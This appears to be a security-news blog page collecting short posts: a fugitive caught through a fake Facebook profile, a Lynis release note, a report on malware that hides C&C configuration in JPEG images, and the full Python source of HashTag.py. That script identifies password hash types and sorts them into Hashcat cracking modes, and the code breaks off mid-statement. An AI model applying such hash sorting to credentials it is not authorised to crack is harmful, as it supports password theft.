Police officers in Freeland, the northernmost town in Pennsylvania, gave a Facebook "Like" to the most interesting post of their careers since Mark Zuckerberg's social network appeared. Anthony Lescowitch, aged 35, could enter the record books in the category "dumbest wanted fugitive". Earlier this week he shared the police post containing his photo and the notice that he was wanted. The officers noticed this and within just a few minutes managed to locate and arrest him. How did that happen? A police officer created a fake Facebook account and posed as "an attractive woman". One thing led to another, and Lescowitch agreed to meet the "woman" for a cigarette. The man, wanted for a very serious physical assault on a person, arrived with a pack of cigarettes, and the "young lady" with a pair of handcuffs, according to usatoday.com. After picking him up, the police posted a message on Facebook: "CAUGHT!!! He shared our post about him being wanted and was arrested 45 minutes later!" via Yahoo! News
-
Firefox > Preferences > Privacy > History: "No save history"
-
Update Lynis Auditing Tool 1.3.6

Changes: This release added many new features, including extended support for *BSD systems such as DragonFly BSD, FreeBSD, NetBSD, and OpenBSD. New support was provided for elementary OS (Luna) along with several new Apache tests, OSSEC, and the dntpd time daemon. New functions have been added to compact the code and simplify development. Smaller bugs have been fixed. Logging and reporting were extended, the man page updated, and the screen display improved. Under the hood, minor adjustments have been made to support systems that are slightly different, such as those missing the dig binary.

Download: Lynis Auditing Tool 1.3.6 ≈ Packet Storm
-
Security researchers at TrendMicro have identified a new type of malware that updates its configuration in a very interesting way: compromised machines are configured to download JPEG files that contain encrypted configuration files/binaries without the victim's knowledge. The image is hosted on a web server located in the Asia-Pacific region and contains three types of settings:

configuration file (Type A)
configuration file (Type B)
binary content (either DLL or EXE files)

The first type of configuration holds the standard C&C settings, which let the attacker send instructions to victim machines, customize the hosts, or update the malware to use another type of configuration. This technique keeps the botnet working in case of functionality issues. The second configuration file contains several process names of antimalware products and hostnames of the compromised network. JPEG images may not only include configurations but also host binary content, which allows malware authors to update the malicious software packages at any moment.

The way cyber-criminals hide their activities is becoming more and more complex, so that their network and techniques are not identified. Hosting a malicious image on a web server is hard for security software to detect. This makes the attack more resilient and keeps it from being spotted by security software.

JPEG files used by attacker to host configuration and binaries for the Malware

TrendMicro also revealed that reversing the images made it possible to identify hostnames and IP addresses of infected machines/networks and the list of images used in the cyber attack that the malware accesses, besides the operating system version installed on infected machines.

Via Image Hosted on Web Server Serving Malware | SecTechno
-
Name: HashTag: Parse and Identify Password Hashes
Version: 0.41
Date: 11/05/2013
Author: Smeege
Contact: SmeegeSec@gmail.com

Description: HashTag.py is a python script written to parse and identify password hashes. It has three main arguments which consist of identifying a single hash type (-sh), parsing and identifying multiple hashes from a file (-f), and traversing subdirectories to locate files which contain hashes and parse/identify them (-d). Many common hash types are supported by the CPU and GPU cracking tool Hashcat. Using an additional argument (-hc) hashcat modes will be included in the output file(s).

#!/usr/bin/python
"""
Name: HashTag: Parse and Identify Password Hashes
Version: 0.41
Date: 11/05/2013
Author: Smeege
Contact: SmeegeSec@gmail.com

Description: HashTag.py is a python script written to parse and identify password hashes. It has three main arguments
which consist of identifying a single hash type (-sh), parsing and identifying multiple hashes from a file (-f), and
traversing subdirectories to locate files which contain hashes and parse/identify them (-d). Many common hash types are
supported by the CPU and GPU cracking tool Hashcat. Using an additional argument (-hc) hashcat modes will be included in
the output file(s).

Copyright (c) 2013, Smeege Sec (http://www.smeegesec.com)
All rights reserved.
Please see the attached LICENSE file for additional licensing information.
"""
import argparse
import mimetypes
import os
import shutil
import string

parser = argparse.ArgumentParser(prog='HashTag.py', usage='%(prog)s {-sh hash |-f file |-d directory} [-o output_filename] [-hc] [-n]')
argGroup = parser.add_mutually_exclusive_group(required=True)
argGroup.add_argument("-sh", "--singleHash", type=str, help="Identify a single hash")
argGroup.add_argument("-f", "--file", type=str, help="Parse a single file for hashes and identify them")
argGroup.add_argument("-d", "--directory", type=str, help="Parse, identify, and categorize hashes within a directory and all subdirectories")
parser.add_argument("-o", "--output", type=str, help="Filename to output full list of all identified hashes. Default is ./HashTag/HashTag_Output_File.txt")
parser.add_argument("-hc", "--hashcatOutput", action='store_true', default=False, help="Output a separate file for each hash type based on hashcat modes")
parser.add_argument("-n", "--notFound", action='store_true', default=False, help="--file:Include unidentifiable hashes in the output file.")
args = parser.parse_args()

# hash string -> list of possible hash type names
hashDict = dict()

# hash type name -> hashcat mode number
hashcatDict = {
    'MD5': '0', 'md5($pass.$salt)': '10', 'Joomla': '11', 'md5($salt.$pass)': '20', 'osCommerce, xt:Commerce': '21',
    'md5(unicode($pass).$salt)': '30', 'md5($salt.unicode($pass))': '40', 'HMAC-MD5 (key = $pass)': '50',
    'HMAC-MD5 (key = $salt)': '60', 'SHA1': '100', 'nsldap, SHA-1(Base64), Netscape LDAP SHA': '101',
    'sha1($pass.$salt)': '110', 'nsldaps, SSHA-1(Base64), Netscape LDAP SSHA': '111', 'Oracle 11g': '112',
    'Oracle 11g, SHA-1(Oracle)': '112', 'sha1($salt.$pass)': '120',
    'sha1(strtolower($username).$pass), SMF >= v1.1': '121', 'OSX v10.4, v10.5, v10.6': '122',
    'sha1(unicode($pass).$salt)': '130', 'MSSQL(2000)': '131', 'MSSQL(2005)': '132',
    'sha1($salt.unicode($pass))': '140', 'EPiServer 6.x < v4': '141', 'HMAC-SHA1 (key = $pass)': '150',
    'HMAC-SHA1 (key = $salt)': '160', 'sha1(LinkedIn)': '190', 'MySQL': '200', 'MySQL4.1/MySQL5': '300',
    'phpass, MD5(Wordpress), MD5(phpBB3)': '400', 'md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5': '500',
    'SHA-1(Django)': '800', 'MD4': '900', 'md4($pass.$salt)': '910', 'NTLM': '1000',
    'Domain Cached Credentials, mscash': '1100', 'SHA256': '1400', 'sha256($pass.$salt)': '1410',
    'sha256($salt.$pass)': '1420', 'sha256(unicode($pass).$salt)': '1430', 'sha256($salt.unicode($pass))': '1440',
    'EPiServer 6.x > v4': '1441', 'HMAC-SHA256 (key = $pass)': '1450', 'HMAC-SHA256 (key = $salt)': '1460',
    'descrypt, DES(Unix), Traditional DES': '1500', 'md5apr1, MD5(APR), Apache MD5': '1600', 'SHA512': '1700',
    'sha512($pass.$salt)': '1710', 'SSHA-512(Base64), LDAP {SSHA512}': '1711', 'sha512($salt.$pass)': '1720',
    'OSX v10.7': '1722', 'sha512(unicode($pass).$salt)': '1730', 'MSSQL(2012)': '1731',
    'sha512($salt.unicode($pass))': '1740', 'HMAC-SHA512 (key = $pass)': '1750', 'HMAC-SHA512 (key = $salt)': '1760',
    'sha512crypt, SHA512(Unix)': '1800', 'Domain Cached Credentials2, mscash2': '2100', 'Cisco-PIX MD5': '2400',
    'WPA/WPA2': '2500', 'Double MD5': '2600', 'md5(md5($pass))': '2600', 'vBulletin < v3.8.5': '2611',
    'vBulletin > v3.8.5': '2711', 'IPB2+, MyBB1.2+': '2811', 'LM': '3000', 'Oracle 7-10g, DES(Oracle)': '3100',
    'bcrypt, Blowfish(OpenBSD)': '3200', 'MD5(Sun)': '3300', 'md5(md5(md5($pass)))': '3500',
    'md5(md5($salt).$pass)': '3610', 'md5($salt.md5($pass))': '3710', 'md5($pass.md5($salt))': '3720',
    'WebEdition CMS': '3721', 'md5($salt.$pass.$salt)': '3810', 'md5(md5($pass).md5($salt))': '3910',
    'md5($salt.md5($salt.$pass))': '4010', 'md5($salt.md5($pass.$salt))': '4110', 'md5($username.0.$pass)': '4210',
    'md5(strtoupper(md5($pass)))': '4300', 'md5(sha1($pass))': '4400', 'sha1(sha1($pass))': '4500',
    'sha1(sha1(sha1($pass)))': '4600', 'sha1(md5($pass))': '4700', 'MD5(Chap)': '4800', 'SHA-3(Keccak)': '5000',
    'Half MD5': '5100', 'Password Safe SHA-256': '5200', 'IKE-PSK MD5': '5300', 'IKE-PSK SHA1': '5400',
    'NetNTLMv1-VANILLA / NetNTLMv1+ESS': '5500', 'NetNTLMv2': '5600', 'Cisco-IOS SHA256': '5700',
    'Samsung Android Password/PIN': '5800', 'RipeMD160': '6000', 'Whirlpool': '6100',
    'TrueCrypt 5.0+ PBKDF2-HMAC-RipeMD160': '621Y', 'TrueCrypt 5.0+ PBKDF2-HMAC-SHA512': '622Y',
    'TrueCrypt 5.0+ PBKDF2-HMAC-Whirlpool': '623Y', 'TrueCrypt 5.0+ PBKDF2-HMAC-RipeMD160 boot-mode': '624Y',
    'TrueCrypt 5.0+': '62XY', 'AIX {smd5}': '6300', 'AIX {ssha256}': '6400', 'AIX {ssha512}': '6500',
    '1Password': '6600', 'AIX {ssha1}': '6700', 'Lastpass': '6800', 'GOST R 34.11-94': '6900',
    'Fortigate (FortiOS)': '7000', 'OSX v10.8': '7100', 'GRUB 2': '7200', 'IPMI2 RAKP HMAC-SHA1': '7300',
    'sha256crypt, SHA256(Unix)': '7400'}


def isHex(singleString):
    """Check whether a string consists of only hexadecimal characters."""
    for c in singleString:
        if not c in string.hexdigits:
            return False
    return True


def isAlphaDotSlash(singleString):
    """Check whether a string consists of letters, digits, '.' or '/' only (the crypt(3) alphabet)."""
    for c in singleString:
        if not c in string.ascii_letters and not c in string.digits and not c in '.' and not c in '/':
            return False
    return True


def safeName(hashType):
    """Hash type names are used as output file names; '/' would turn them into directory paths."""
    return hashType.replace('/', '_')


def identifyHash(singleHash):
    """Identify a single hash string based on attributes such as character length, character type (hex, alphanum,
    etc.), and specific substring identifiers. The conditional statements are ordered specifically to address
    efficiency when dealing with large inputs."""
    if len(singleHash) == 32 and isHex(singleHash):
        hashDict[singleHash] = ['MD5', 'NTLM', 'MD4', 'LM', 'RAdmin v2.x', 'Haval-128', 'MD2', 'RipeMD-128',
            'Tiger-128', 'Snefru-128', 'MD5(HMAC)', 'MD4(HMAC)', 'Haval-128(HMAC)', 'RipeMD-128(HMAC)',
            'Tiger-128(HMAC)', 'Snefru-128(HMAC)', 'MD2(HMAC)', 'MD5(ZipMonster)', 'MD5(HMAC(Wordpress))',
            'Skein-256(128)', 'Skein-512(128)', 'md5($pass.$salt)', 'md5($pass.$salt.$pass)', 'md5($pass.md5($pass))',
            'md5($salt.$pass)', 'md5($salt.$pass.$salt)', 'md5($salt.$pass.$username)', 'md5($salt.\'-\'.md5($pass))',
            'md5($salt.md5($pass))', 'md5($salt.md5($pass).$salt)', 'md5($salt.MD5($pass).$username)',
            'md5($salt.md5($pass.$salt))', 'md5($salt.md5($salt.$pass))', 'md5($salt.md5(md5($pass).$salt))',
            'md5($username.0.$pass)', 'md5($username.LF.$pass)', 'md5($username.md5($pass).$salt)',
            'md5(1.$pass.$salt)', 'md5(3 x strtoupper(md5($pass)))', 'md5(md5($pass)), Double MD5',
            'md5(md5($pass).$pass)', 'md5(md5($pass).$salt), vBulletin < v3.8.5', 'md4($salt.$pass)',
            'md4($pass.$salt)', 'md5(md5($pass).md5($pass))', 'md5(md5($pass).md5($salt))', 'md5(md5($salt).$pass)',
            'md5(md5($salt).md5($pass))', 'md5(md5($username.$pass).$salt)', 'md5(md5(base64_encode($pass)))',
            'md5(md5(md5($pass)))', 'md5(md5(md5(md5($pass))))', 'md5(md5(md5(md5(md5($pass)))))', 'md5(sha1($pass))',
            'md5(sha1(base64_encode($pass)))', 'md5(sha1(md5($pass)))', 'md5(sha1(md5($pass)).sha1($pass))',
            'md5(sha1(md5(sha1($pass))))', 'md5(strrev($pass))', 'md5(strrev(md5($pass)))',
            'md5(strtoupper(md5($pass)))', 'md5(strtoupper(md5(strtoupper(md5(strtoupper(md5($pass)))))))',
            'strrev(md5($pass))', 'strrev(md5(strrev(md5($pass))))', '6 x md5($pass)', '7 x md5($pass)',
            '8 x md5($pass)', '9 x md5($pass)', '10 x md5($pass)', '11 x md5($pass)', '12 x md5($pass)']
    elif len(singleHash) > 32 and singleHash[32] == ':' and singleHash.count(':') == 1:
        hashDict[singleHash] = ['md5($salt.$pass.$salt)', 'md5($salt.md5($pass))', 'md5($salt.md5($pass.$salt))',
            'md5($salt.md5($salt.$pass))', 'md5($username.0.$pass)', 'md5(md5($pass).md5($salt))',
            'md5(md5($salt).$pass)', 'HMAC-MD5 (key = $pass)', 'HMAC-MD5 (key = $salt)', 'md5($pass.md5($salt))',
            'WebEdition CMS', 'IPB2+, MyBB1.2+', 'md5(unicode($pass).$salt)', 'Domain Cached Credentials2, mscash2',
            'md5($salt.unicode($pass))', 'vBulletin > v3.8.5', 'DCC2', 'md5(md5($pass).$salt), vBulletin < v3.8.5']
    elif len(singleHash) == 40:
        hashDict[singleHash] = ['SHA1', 'Tiger-160', 'Haval-160', 'RipeMD160', 'HAS-160', 'SHA-1(HMAC)',
            'Tiger-160(HMAC)', 'Haval-160(HMAC)', 'RipeMD-160(HMAC)', 'Skein-256(160)', 'Skein-512(160)',
            'sha1(LinkedIn)', 'SAPG', 'SHA-1(MaNGOS)', 'SHA-1(MaNGOS2)', 'sha1($salt.$pass.$salt)',
            'sha1(md5($pass.$salt))', 'sha1(md5($pass).$userdate.$salt)', 'sha1($pass.$username.$salt)',
            'sha1(md5($pass).$pass)', 'sha1(md5(sha1($pass)))', 'xsha1(strtolower($pass))', 'sha1($pass.$salt)',
            'sha1($salt.$pass)', 'sha1($salt.$username.$pass.$salt)', 'sha1($salt.md5($pass))',
            'sha1($salt.md5($pass).$salt)', 'sha1($salt.sha1($pass))', 'sha1($salt.sha1($salt.sha1($pass)))',
            'sha1($username.$pass)', 'sha1($username.$pass.$salt)', 'sha1(md5($pass))', 'sha1(md5($pass).$salt)',
            'sha1(md5(sha1(md5($pass))))', 'sha1(sha1($pass))', 'sha1(sha1($pass).$salt)',
            'sha1(sha1($pass).substr($pass,0,3))', 'sha1(sha1($salt.$pass))', 'sha1(sha1(sha1($pass)))',
            'sha1(strtolower($username).$pass)']
    elif len(singleHash) > 40 and singleHash[40] == ':' and singleHash.count(':') == 1:
        hashDict[singleHash] = ['sha1($pass.$salt)', 'HMAC-SHA1 (key = $pass)', 'HMAC-SHA1 (key = $salt)',
            'sha1(unicode($pass).$salt)', 'sha1($salt.$pass)', 'sha1($salt.unicode($pass))',
            'Samsung Android Password/PIN', 'sha1($salt.$pass.$salt)', 'sha1(md5($pass.$salt))',
            'sha1(md5($pass).$userdate.$salt)', 'sha1($pass.$username.$salt)']
    elif len(singleHash) == 64 and isHex(singleHash):
        hashDict[singleHash] = ['Keccak-256', 'sha256(md5($pass).$pass))', 'Skein-256', 'Skein-512(256)', 'Ventrilo',
            'WPA-PSK PMK', 'GOST R 34.11-94', 'Haval-256', 'RipeMD-256', 'SHA256', 'sha256(md5($pass))',
            'sha256(sha1($pass))', 'Snefru-256', 'HMAC-SHA256 (key = $salt)', 'SHA-3(Keccak)']
    elif len(singleHash) > 64 and singleHash[64] == ':' and singleHash.count(':') == 1:
        hashDict[singleHash] = ['sha256(md5($pass.$salt))', 'sha256(md5($salt.$pass))', 'SHA-256(RuneScape)',
            'sha256(sha256($pass).$salt)', 'Haval-256(HMAC)', 'RipeMD-256(HMAC)', 'sha256($pass.$salt)',
            'sha256($salt.$pass)', 'SHA-256(HMAC)', 'Snefru-256(HMAC)', 'HMAC-SHA256 (key = $pass)',
            'sha256(unicode($pass).$salt)', 'sha256($salt.unicode($pass))']
    elif singleHash.startswith('sha1$'):
        hashDict[singleHash] = ['SHA-1(Django)']
    elif singleHash.startswith('$H$'):
        hashDict[singleHash] = ['phpass, MD5(Wordpress), MD5(phpBB3)']
    elif singleHash.startswith('$P$'):
        hashDict[singleHash] = ['phpass, MD5(Wordpress), MD5(phpBB3)']
    elif singleHash.startswith('$1$'):
        hashDict[singleHash] = ['md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5']
    elif singleHash.startswith('$apr1$'):
        hashDict[singleHash] = ['md5apr1, MD5(APR), Apache MD5']
    elif singleHash.startswith('sha256$'):
        hashDict[singleHash] = ['SHA-256(Django)']
    elif singleHash.startswith('sha384$'):
        hashDict[singleHash] = ['SHA-384(Django)']
    elif singleHash.startswith('$SHA$'):
        hashDict[singleHash] = ['SHA-256(AuthMe)']
    elif singleHash.startswith('$2$') or singleHash.startswith('$2a$') or singleHash.startswith('$2y$'):
        hashDict[singleHash] = ['bcrypt, Blowfish(OpenBSD)']
    elif singleHash.startswith('$5$'):
        hashDict[singleHash] = ['sha256crypt, SHA256(Unix)']
    elif singleHash.startswith('$6$'):
        hashDict[singleHash] = ['sha512crypt, SHA512(Unix)']
    elif singleHash.startswith('$S$'):
        hashDict[singleHash] = ['SHA-512(Drupal)']
    elif singleHash.startswith('{SHA}'):
        hashDict[singleHash] = ['nsldap, SHA-1(Base64), Netscape LDAP SHA']
    elif singleHash.startswith('{SSHA}'):
        hashDict[singleHash] = ['nsldaps, SSHA-1(Base64), Netscape LDAP SSHA']
    elif singleHash.startswith('{smd5}'):
        hashDict[singleHash] = ['AIX {smd5}']
    elif singleHash.startswith('{ssha1}'):
        hashDict[singleHash] = ['AIX {ssha1}']
    elif singleHash.startswith('$md5$'):
        hashDict[singleHash] = ['MD5(Sun)']
    elif singleHash.startswith('$episerver$*0*'):
        hashDict[singleHash] = ['EPiServer 6.x < v4']
    elif singleHash.startswith('$episerver$*1*'):
        hashDict[singleHash] = ['EPiServer 6.x > v4']
    elif singleHash.startswith('{ssha256}'):
        hashDict[singleHash] = ['AIX {ssha256}']
    elif singleHash.startswith('{SSHA512}'):
        hashDict[singleHash] = ['SSHA-512(Base64), LDAP {SSHA512}']
    elif singleHash.startswith('{ssha512}'):
        hashDict[singleHash] = ['AIX {ssha512}']
    elif singleHash.startswith('$ml$'):
        hashDict[singleHash] = ['OSX v10.8']
    elif singleHash.startswith('grub'):
        hashDict[singleHash] = ['GRUB 2']
    elif singleHash.startswith('0x'):
        if len(singleHash) == 34:
            hashDict[singleHash] = ['Lineage II C4']
        elif len(singleHash) < 60:
            hashDict[singleHash] = ['MSSQL(2005)']
        elif len(singleHash) < 100:
            hashDict[singleHash] = ['MSSQL(2000)']
        else:
            hashDict[singleHash] = ['MSSQL(2012)']
    elif singleHash.startswith('S:'):
        hashDict[singleHash] = ['Oracle 11g']
    elif len(singleHash) > 41 and singleHash.count(':') == 1 and singleHash[-41] == ':' and isHex(singleHash[-40:]):
        hashDict[singleHash] = ['sha1(strtolower($username).$pass), SMF >= v1.1']
    elif singleHash.count(':') > 1:
        if singleHash.count(':') == 5:
            hashDict[singleHash] = ['NetNTLMv2', 'NetNTLMv1-VANILLA / NetNTLMv1+ESS']
        elif singleHash.count(':') == 2 and '@' not in singleHash:
            hashDict[singleHash] = ['MD5(Chap)']
        elif singleHash.count(':') == 3 or singleHash.count(':') == 6:
            hashDict[singleHash] = ['Domain Cached Credentials, mscash']
            # pwdump style lines (user:rid:LM:NT:::) also carry a standalone NT hash and, unless it is the
            # well-known empty-password value, a standalone LM hash. Both are stored as lists like every
            # other entry so the output loops below can iterate over them.
            try:
                hashDict[singleHash.split(':')[3]] = ['NTLM']
                if not singleHash.split(':')[2] == 'aad3b435b51404eeaad3b435b51404ee' and not singleHash.split(':')[2] == 'aad3b435b51404eeaad3b435b51404ee'.upper():
                    hashDict[singleHash.split(':')[2]] = ['LM']
            except Exception:
                pass
        elif singleHash.count(':') == 2 and '@' in singleHash:
            hashDict[singleHash] = ['Lastpass']
        else:
            hashDict[singleHash] = []
    elif len(singleHash) == 4:
        hashDict[singleHash] = ['CRC-16', 'CRC-16-CCITT', 'FCS-16']
    elif len(singleHash) == 8:
        hashDict[singleHash] = ['CRC-32', 'CRC-32B', 'FCS-32', 'ELF-32', 'Fletcher-32', 'FNV-32', 'Adler-32',
            'GHash-32-3', 'GHash-32-5']
    elif len(singleHash) == 13:
        if singleHash.startswith('+'):
            hashDict[singleHash] = ['Blowfish(Eggdrop)']
        else:
            hashDict[singleHash] = ['descrypt, DES(Unix), Traditional DES']
    elif len(singleHash) == 16:
        if isHex(singleHash):
            hashDict[singleHash] = ['MySQL, MySQL323', 'Oracle 7-10g, DES(Oracle)', 'CRC-64', 'SAPB',
                'substr(md5($pass),0,16)', 'substr(md5($pass),16,16)', 'substr(md5($pass),8,16)']
        else:
            hashDict[singleHash] = ['Cisco-PIX MD5']
    elif len(singleHash) > 16 and singleHash[-17] == ':' and singleHash.count(':') == 1:
        hashDict[singleHash] = ['DES(Oracle)', 'Oracle 10g']
    elif len(singleHash) == 20:
        hashDict[singleHash] = ['substr(md5($pass),12,20)']
    elif len(singleHash) == 24 and isHex(singleHash):
        hashDict[singleHash] = ['CRC-96(ZIP)']
    elif len(singleHash) == 35:
        hashDict[singleHash] = ['osCommerce, xt:Commerce']
    elif len(singleHash) > 40 and singleHash.count('-') == 2 and singleHash.count(':') == 2:
        hashDict[singleHash] = ['sha1(md5($pass).$userdate.$salt)']
    elif len(singleHash) > 40 and singleHash.count(':') == 2 and len(singleHash.split(':')[1]) == 40:
        hashDict[singleHash] = ['sha1($pass.$username.$salt)']
    elif len(singleHash) == 41 and singleHash.startswith('*') and isHex(singleHash[1:40]):
        hashDict[singleHash] = ['MySQL4.1/MySQL5']
    elif len(singleHash) == 43:
        hashDict[singleHash] = ['Cisco-IOS SHA256']
    elif len(singleHash) == 47:
        hashDict[singleHash] = ['Fortigate (FortiOS)']
    elif len(singleHash) == 48 and isHex(singleHash):
        hashDict[singleHash] = ['Oracle 11g, SHA-1(Oracle)', 'Haval-192', 'Haval-192(HMAC)', 'Tiger-192',
            'Tiger-192(HMAC)', 'OSX v10.4, v10.5, v10.6']
    elif len(singleHash) == 51 and isHex(singleHash):
        hashDict[singleHash] = ['MD5(Palshop)', 'Palshop']
    elif len(singleHash) == 56 and isHex(singleHash):
        hashDict[singleHash] = ['SHA-224', 'Haval-224', 'SHA-224(HMAC)', 'Haval-224(HMAC)', 'Keccak-224',
            'Skein-256(224)', 'Skein-512(224)']
    elif len(singleHash) == 65:
        hashDict[singleHash] = ['Joomla']
    elif len(singleHash) > 64 and singleHash[64] == ':':
        hashDict[singleHash] = ['SHA-256(PasswordSafe)', 'sha256(md5($salt.$pass))', 'sha256(md5($pass.$salt))',
            'SHA-256(HMAC)', 'SHA-256(RuneScape)', 'sha256($salt.$pass)', 'sha256($pass.$salt)', 'Haval-256(HMAC)',
            'RipeMD-256(HMAC)', 'Snefru-256(HMAC)', 'sha256(sha256($pass).$salt)']
    elif len(singleHash) == 80 and isHex(singleHash):
        hashDict[singleHash] = ['RipeMD-320', 'RipeMD-320(HMAC)']
    elif len(singleHash) == 96 and isHex(singleHash):
        hashDict[singleHash] = ['SHA-384', 'Keccak-384', 'SHA-384(HMAC)', 'sha384($salt.$pass)', 'sha384($pass.$salt)',
            'Skein-512(384)', 'Skein-1024(384)']
    elif len(singleHash) == 128 and isHex(singleHash):
        hashDict[singleHash] = ['Keccak-512', 'Skein-1024(512)', 'Skein-512', 'SHA512', 'sha512($pass.$salt)',
            'sha512($salt.$pass)', 'SHA-512(HMAC)', 'Whirlpool', 'Whirlpool(HMAC)', 'sha512(unicode($pass).$salt)',
            'sha512($salt.unicode($pass))', 'HMAC-SHA512 (key = $pass)']
    elif len(singleHash) > 128 and singleHash[128] == ':':
        hashDict[singleHash] = ['HMAC-SHA512 (key = $salt)']
    elif len(singleHash) == 130 and isHex(singleHash):
        hashDict[singleHash] = ['IPMI2 RAKP HMAC-SHA1']
    elif len(singleHash) == 136 and isHex(singleHash):
        hashDict[singleHash] = ['OSX v10.7']
    elif len(singleHash) == 177:
        hashDict[singleHash] = ['Whirlpool(Double)']
    elif len(singleHash) == 256 and isHex(singleHash):
        hashDict[singleHash] = ['Skein-1024']
    else:
        hashDict[singleHash] = []


if args.singleHash:
    """
    Single Hash Identification: HashTag.py -sh hash
    Prints to screen all possible hash types and their corresponding hashcat mode if one exists.
    Note: When identifying a single hash on *nix operating systems remember to use single quotes to prevent
    interpolation. (e.g. python HashTag.py -sh '$1$abc$12345')
    """
    identifyHash(args.singleHash)
    if len(hashDict[args.singleHash]):
        print '\nHash: {0}\n'.format(args.singleHash)
        for value in hashDict[args.singleHash]:
            hcFound = False
            for k, v in hashcatDict.iteritems():
                if value == k:
                    print '[*] {0} - Hashcat Mode {1}'.format(value, v)
                    hcFound = True
                    break
            if hcFound == False:
                print '[*] {0}'.format(value)
    else:
        print '\nHash not found: {0}'.format(args.singleHash)

elif args.file:
    """
    File Parsing and Hash Identification: HashTag.py -f file.txt [-o output_filename] [-hc] [-n]
    Parses a single file for possible password hashes and attempts to identify each one. Outputs to one or multiple
    files depending on -hc argument.
    """
    inputFile = args.file
    hashCount = 0
    foundModes = list()
    while not os.path.isfile(inputFile):
        inputFile = raw_input("\nFile \'{0}\' not Found!\n\nHash File Path: ".format(str(inputFile)))
    openInputFile = open(inputFile, 'r')
    if not os.path.exists('HashTag'):
        os.mkdir('HashTag')
    if args.output:
        while os.path.isfile(args.output) or os.path.isfile(args.output + '.txt'):
            args.output = raw_input("\nOutput file already exists!\n\nOutput Filename: ")
        outputFile = open(args.output, 'w')
    else:
        outputFile = open(os.path.join('HashTag', 'HashTag_Output_File.txt'), 'w')
    for line in openInputFile.readlines():
        identifyHash(line.strip())
    if hashDict:
        for k, v in hashDict.iteritems():
            for mode, num in hashcatDict.iteritems():
                if mode in v:
                    hashcatMode = num
                    foundModes.append(num)
                else:
                    hashcatMode = ''
            if v:
                hashCount += 1
                foundModes.sort(key=int)
                outputFile.write('Hash: {0}\nChar Length: {1}\nHashcat Modes: {2}\nHash Types: {3}\n\n'.format(k, len(k), foundModes, v))
                if args.hashcatOutput and foundModes:
                    for mode in foundModes:
                        with open(os.path.join('HashTag', mode), "a") as outputTypeFile:
                            outputTypeFile.write(k + '\n')
                foundModes = []   # reset per hash, otherwise modes accumulate across hashes
            elif k and args.notFound:
                outputFile.write('Hash: {0}\nChar Length: {1}\nHashcat Modes: {2}\nHash Types: {3}\n\n'.format(k, len(k), hashcatMode, 'NONE FOUND'))
        print '\nFile Mimetype: {0}\nHashes Found: {1}\nFile successfully written: {2}'.format(mimetypes.guess_type(inputFile)[0], hashCount, outputFile.name)
        openInputFile.close()
        outputFile.close()
    else:
        print '\nNo hashes parsed from file {0}'.format(inputFile)

elif args.directory:
    """
    File Parsing and Hash Identification while traversing directories and subdirectories:
    HashTag.py -d test_dir/hash_files/ [-o output_filename] [-hc]
    Traverses user specified directory and all subdirectories. Identifies each file based on type or extension and
    attempts to parse each file for possible password hashes. Potential password protected files are separated by
    filetype and copied using the shutil module to new folders. Outputs to one or multiple files depending on -hc
    argument.
    """
    inputDir = args.directory
    while not os.path.isdir(inputDir):
        inputDir = raw_input("\nDirectory \'{0}\' not Found!\n\nHash Files Directory: ".format(str(inputDir)))
    if not os.path.exists('HashTag'):
        os.mkdir('HashTag')
    if args.output:
        while os.path.isfile(args.output) or os.path.isfile(args.output + '.txt'):
            args.output = raw_input("\nOutput file already exists!\n\nOutput Filename: ")
        outputFile = open(args.output, 'w')
    else:
        outputFile = open(os.path.join('HashTag', 'HashTag_Hash_File.txt'), 'w')
    validFiles = list()
    validHashes = list()
    invalidFiles = list()
    nonTextFiles = ['.1password', '.7z', '.bdb', '.dd', '.hccap', '.ikemd5', '.ikesha1', '.kdbx', '.odt', '.pdf',
        '.plist', '.psafe', '.sig', '.sign', '.tc', '.torrent', '.zip', '.xz']
    nonTextFileCount = 0
    for root, dirnames, filenames in os.walk(inputDir):
        for filename in filenames:
            if mimetypes.guess_type(filename)[0] == 'text/plain' or '.hash' in filename:
                foundHashFile = (os.path.join(root, filename))
                validFiles.append(foundHashFile)
            elif any(nonTextFile in filename for nonTextFile in nonTextFiles):
                for nonTextFile in nonTextFiles:
                    if nonTextFile in filename:
                        newDir = os.path.join('HashTag', nonTextFile.replace('.', ''))
                        if not os.path.exists(newDir):
                            os.makedirs(newDir)
                        shutil.copy2(os.path.join(root, filename), os.path.join(newDir, filename))
                        nonTextFileCount += 1   # counted here so the file totals below are right
            else:
                invalidFiles.append((os.path.join(root, filename)))
    if validFiles:
        for hashFile in validFiles:
            openHashFile = open(hashFile)
            hashLines = [line.strip() for line in openHashFile]
            for singleHash in hashLines:
                if len(singleHash) > 3 and len(singleHash) <= 300:
                    validHashes.append(singleHash)
            openHashFile.close()
    else:
        print 'No valid file formats found.'
    if validHashes:
        for singleHash in validHashes:
            identifyHash(singleHash)
            # Write all parsed hashes to output file. Comment out for less overhead.
            outputFile.write(singleHash + '\n')
    outputFile.close()
    validHashCount = len(validHashes)
    validFileCount = len(validFiles) + nonTextFileCount
    invalidFileCount = len(invalidFiles)
    print '\nTotal Hashes Found: {0}'.format(validHashCount)
    print 'Valid file types: {0}'.format(validFileCount)
    print 'Invalid file types: {0}'.format(invalidFileCount)
    openInvalidFiles = open(os.path.join('HashTag', 'HashTag_Invalid_Files' + '.txt'), 'w')
    for invalidFile in invalidFiles:
        openInvalidFiles.write(invalidFile + '\n')
    openInvalidFiles.close()
    print '\nNow identifying {0} hashes from {1} files...'.format(validHashCount, validFileCount)
    notifyCount = 0
    tenPercentCount = max(validHashCount / 10, 1)   # never 0, so the progress modulo below cannot divide by zero
    if args.hashcatOutput:
        for key, valueList in hashDict.iteritems():
            if valueList:
                for value in valueList:
                    if value in hashcatDict.iterkeys():
                        with open(os.path.join('HashTag', safeName(value)) + '_{0}.txt'.format(hashcatDict[value]), "a") as f:
                            f.write(key + '\n')
                    else:
                        with open(os.path.join('HashTag', safeName(value)) + '.txt', "a") as f:
                            f.write(key + '\n')
            else:
                with open(os.path.join('HashTag', 'HashTag_Invalid_Hashes') + '.txt', "a") as g:
                    g.write(key + '\n')
            notifyCount += 1
            if (notifyCount % tenPercentCount) == 0:
                print '{0}/{1} hashes have been identified and written.'.format(notifyCount, validHashCount)
    else:
        for key, valueList in hashDict.iteritems():
            if valueList:
                for value in valueList:
                    with open(os.path.join('HashTag', safeName(value)) + '.txt', "a") as f:
                        f.write(key + '\n')
            else:
                with open(os.path.join('HashTag', 'HashTag_Invalid_Hashes') + '.txt', "a") as g:
